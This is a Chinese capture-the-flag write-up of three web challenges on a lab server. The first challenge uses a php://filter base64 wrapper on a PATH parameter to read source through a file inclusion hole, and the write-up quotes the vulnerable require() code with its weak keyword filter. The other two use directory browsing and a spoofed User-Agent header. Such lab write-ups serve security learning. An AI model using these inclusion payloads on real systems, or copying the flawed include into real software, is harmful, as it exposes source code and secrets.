实验环境地址:
点开就是这样:
答案肯定是不对的
然后根据跳转 地址变为了:
http://124.128.55.5:25136/index.php?PATH=flag
参考>http://blog.csdn.net/keysking/article/details/54728702
可构造地址如下
http://124.128.55.5:25136/index.php?PATH=php://filter/convert.base64-encode/resource=index
得到源码base64加密后的结果,解码得到源码.发现有提示,:
Look carefully
I am flag !touch me!0rz......';
}
$file=$_GET['PATH'].".php";
if(strstr($file,"../")||stristr($file,"fd")||stristr($file,"input")||stristr($file,"data")||stristr($file,"..\\"))
{
echo "";
exit();
}
require($file);
?>
提示:flag!is in FFFlag.php
同样的方法再来一遍
http://124.128.55.5:25136/index.php?PATH=php://filter/convert.base64-encode/resource=FFFlag
得到源码 解密得到
环境:
http://124.128.55.5:23521/
打开,查看源码,发现有提示:
然后在地址栏输入 http://124.128.55.5:23521/m1a0.html
用bp抓包,然后
然后得到提示: src=”templates/images/xxx/xxx/xxx/xxx/m1a0/flag.jpg”
输入 http://124.128.55.5:23521/templates/images/xxx/xxx/xxx/xxx/m1a0/flag.jpg 查看 发现什么也没有而且图片打不开,后经大佬提醒,图片在哪flag在哪,于是查看上一级 http://124.128.55.5:23521/templates/images/xxx/xxx/xxx/xxx/m1a0
找到如下
下载1.zip解压得到 flag:{Ohhhh!!!U_get_me}
环境:
http://124.128.55.5:57160/2099.php
打开就有提示 必须ios99才能打开,于是修改UA
ios99 [Other]: Mozilla/5.0 (iPhone; CPU iPhone OS 99 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A403 Safari/8536.25
用bp抓包,send to repeater,发现flag在headers里
BY Soider915